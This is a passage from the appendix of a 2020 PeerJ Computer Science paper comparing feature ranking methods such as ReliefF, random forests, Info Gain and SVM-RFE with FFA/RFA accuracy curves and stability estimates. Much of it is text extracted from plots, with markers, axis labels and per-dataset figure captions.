0.327 0.397 0.519 0.726 1.091 Combined 0.1 0.171 0.252 0.32 0.432 0.652 1.048 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 22/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Results For our analysis, we consider three types of graphs. The first two types are FFA curves (Fig. A1A) and RFA curves (Fig. A1B). The third is the stability estimate graph (Fig. A1C) where the y-axis refers to the value of the stability indicator (4): the higher the value, the less stable the ranking method. Each point, k, on the x-axis represents the size of the considered feature subsets, consisting of the top ranked k features. Upon a visual inspection of the overall results in Fig. 4, we can conclude that all of the feature ranking methods can correctly detect the features individually related to the target. However, Info Gain and SVM-RFE (Figs. 4C and 4D, respectively) exhibit random behavior for the XOR features, that is, are unable to assign proper relevance values to them. Random Forests (Fig. 4B) separate relevant from irrelevant features, but the ordering of the relevant features is mixed. Finally, ReliefF (Fig. 4A) provides the ranking that is the closest to the ground truth. These differences in behavior among the different ranking methods are also clearly reflected in the FFA and RFA curves in Figs. A1A and A1B. In Fig. A1B, the RFA curves for Info Gain and SVM-RFE have a similar behavior: Namely, a linearly increasing accuracy (from right to left) in the region where the relevant features are randomly distributed and a sharp increase in accuracy in the region where the individually relevant features are included. On the other hand, the RFA curves of both random forests and ReliefF remain first constant and then increase abruptly when the top-ranked features are included. These two groups of methods can be also distinguished from the FFA curves. The FFA curves of all methods are first increasing abruptly and then slightly decreasing but the FFA curves of ReliefF and random forests increase during more steps and reach higher accuracy than Info Gain and SVM-RFE. This clearly indicates that while Info Gain and SVM manage to identify a proportion of the relevant features and put them at the 0 20 40 60 80 100 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ground truth info gain random forests reliefF SVM−RFE random A 0 20 40 60 80 100 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ground truth info gain random forests reliefF SVM−RFE random B 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce 0 20 40 60 80 100 infoGain rforest relief svmRfe C Figure A1 Ranking quality assessment for dataset combined in terms of the FFA (A) and RFA curves (B), and rankings’ stability estimates (C). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A1 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 23/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A1 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ top of the ranking, this proportion is nevertheless smaller than the one identified by random forests and ReliefF. Forward feature addition and RFA curves undoubtedly allow us to compare the quality of the different ranking algorithms. The FFA/RFA curves of all methods are clearly better than the curves of the random ranking. The ReliefF ranking algorithm, however, clearly outperforms the other methods. It has the best error curves, for example, the curves that are the closest to the ground truth ranking. The second best method are random forests: they exhibit very similar performances, but show a slightly worse FFA curve. Both Info Gain and SVM-RFE are clearly inferior in terms of both FFA and RFA curves. Stability-wise, as seen in Fig. A1C, all of the algorithms are stable in the region of the relevant features that they can detect, except for random forests, which has an instability peak exactly in this region. This means that random forests are in this case capable of detecting all the relevant features, but are highly unstable in the estimation of their ordering. Further inspection reveals that Relief generates not only the best rankings in terms of FFA/RFA curves, but also the most stable ones. APPENDIX 4 In this section, we provide detailed per dataset results from the experimental study. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 24/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ●●●●●● ● ● ● ● ●●●●● ● ●● ● ● ● ●●●●●●●●●●●● ●●●●●●●●●● ●●●● ●●●●●●● ●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ●● ●● ●● ● ●● ●● ●●●●● ● ●●●● ●●● ●●● ●● ●● ● ●● ●●●●●●●●●●●●●●● ●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ●● ●● ●● ●● ●●● ●● ●●● ●●●● ●●●● ●● ●● ●●●● ●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● 1 18 38 86 118 138 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ●● ● ● ● ● ● ● ● ● ●● ●●● ●● ●● ●●● ●● ●● ●● ●● ●●● ●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●● ●●● ●●● ●● ● ●● ● ● ●● ● ●● ●● ● ● ●● ●● ●●● ●●● ●● ● ●●●●●●●●●● ●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●● ●●●●●● ●●● ●●● ●●● ●● ●● ●● ●● ●● ●● ●● ●● ●● ●● ●●● ●●● ●● ●●● ●●● ●● ● ●● ●● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● 1 15 30 45 96 159 219 279 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ●●●● ●●●●● ● ●●● ● ●●●●● ●● ●●● ●●● ● ● ● ●●● ●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ●● ●●●● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●● ● ● ● ● ● ● ● ●● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●● ●● ●●● ●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ●●● ●●●● ●● ●● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ● ● ● ● ● ● ●● ● ● ● ● ●● ●●●●●● ● ●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ●● ● ●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 18 38 86 118 138 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ●●●●●● ● ●● ●●●●● ●●●● ●●● ●●●●●●●●●●●●●●● ●●●●●●●●●●●● ● ●●●●●●●●●● ●●●●●●●● ●● ●●●● ●●●●●●●●●●●●●●●●● ●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●● ● ●●●●●●●●●●●●●●●●●●●● ● ●●●●●●●●●●●●●●● ●●●●●● ●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● 1 15 30 45 96 159 219 279 ● ● ● infoGain rforest relief svmRfe random D 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ●● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●● ●● ●● ●● ● ● ● ● ● ● ●● ●● ●●● ●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●● 5 15 35 55 75 95 ● ● infoGain rforest relief svmRfe E 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ●● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●● ● ● ●●●●● ● ●●● ●●● ●●● ●●● ●●●● ●●●● ●●●● ●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● 8 19 41 63 85 170 ● ● infoGain rforest relief svmRfe F Figure A2 Ranking quality assessment for datasets aapc (A, C and E) and arrhythmia (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A2 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 25/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A2 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 6 14 22 30 38 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● 1 2 3 4 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 6 14 22 30 38 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● 1 2 3 4 ● ● ● infoGain rforest relief svmRfe random D 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 6 14 22 30 38 ● ● infoGain rforest relief svmRfe E 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● 1 2 3 4 ● ● infoGain rforest relief svmRfe F Figure A3 Ranking quality assessment for datasets australian (A, C and E) and balance (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A3 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 26/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A3 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 8 16 24 32 40 48 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 9 13 17 21 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 8 16 24 32 40 48 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 9 13 17 21 ● ● ● infoGain rforest relief svmRfe random D 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 8 16 24 32 40 48 ● ● infoGain rforest relief svmRfe E 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 9 13 17 21 ● ● infoGain rforest relief svmRfe F Figure A4 Ranking quality assessment for datasets breast-cancer (A, C and E) and car (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A4 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 27/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A4 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 6 14 22 30 38 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 2 3 4 5 6 7 8 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 1 .0 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 6 14 22 30 38 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 2 3 4 5 6 7 8 ● ● ● infoGain rforest relief svmRfe random D 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 6 14 22 30 38 ● ● infoGain rforest relief svmRfe E 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 2 3 4 5 6 7 8 ● ● infoGain rforest relief svmRfe F Figure A5 Ranking quality assessment for datasets chess (A, C and E) and diabetes (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A5 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 28/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A5 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .3 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 10 18 26 34 42 50 86 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 13 21 29 37 45 59 ● ● ● infoGain rforest relief svmRfe random B 0 .3 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 10 18 26 34 42 50 86 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 5 13 21 29 37 45 59 ● ● ● infoGain rforest relief svmRfe random D 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●● ●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ●● ●●●●●●● ●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ●●●●●●●●● 6 14 30 46 62 78 ● ● infoGain rforest relief svmRfe E 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 3 11 19 27 35 43 51 59 ● ● infoGain rforest relief svmRfe F Figure A6 Ranking quality assessment for datasets diversity (A, C and E) and german (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A6 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 29/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A6 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 6 10 14 18 22 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 6 10 14 18 22 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 6 10 14 18 22 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 6 10 14 18 22 ● ● ● infoGain rforest relief svmRfe random D 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 2 6 10 14 18 22 ● ● infoGain rforest relief svmRfe E 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 2 6 10 14 18 22 ● ● infoGain rforest relief svmRfe F Figure A7 Ranking quality assessment for datasets heart-c (A, C and E) and heart-h (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A7 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 30/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A7 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 4 8 12 16 20 ● ● ● infoGain rforest relief svmRfe random A 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 3 7 11 15 19 ● ● ● infoGain rforest relief svmRfe random B 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 4 8 12 16 20 ● ● ● infoGain rforest relief svmRfe random C 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 1 3 7 11 15 19 ● ● ● infoGain rforest relief svmRfe random D 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 4 8 12 16 20 ● ● infoGain rforest relief svmRfe E 0 .0 0 .2 0 .4 0 .6 0 .8 top k features n o rm a liz e d C a n b e rr a d is ta n ce ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 3 7 11 15 19 ● ● infoGain rforest relief svmRfe F Figure A8 Ranking quality assessment for datasets heart (A, C and E) and hepatitis (B, D and F) in terms of the FFA (A and B) and RFA curves (C and D), and rankings’ stability estimates (E and F). The FFA/RFA curves are obtained by using SVMs. Full-size DOI: 10.7717/peerj-cs.310/fig-A8 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 31/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-A8 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ 0 .2 0 .4 0 .6 0 .8 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 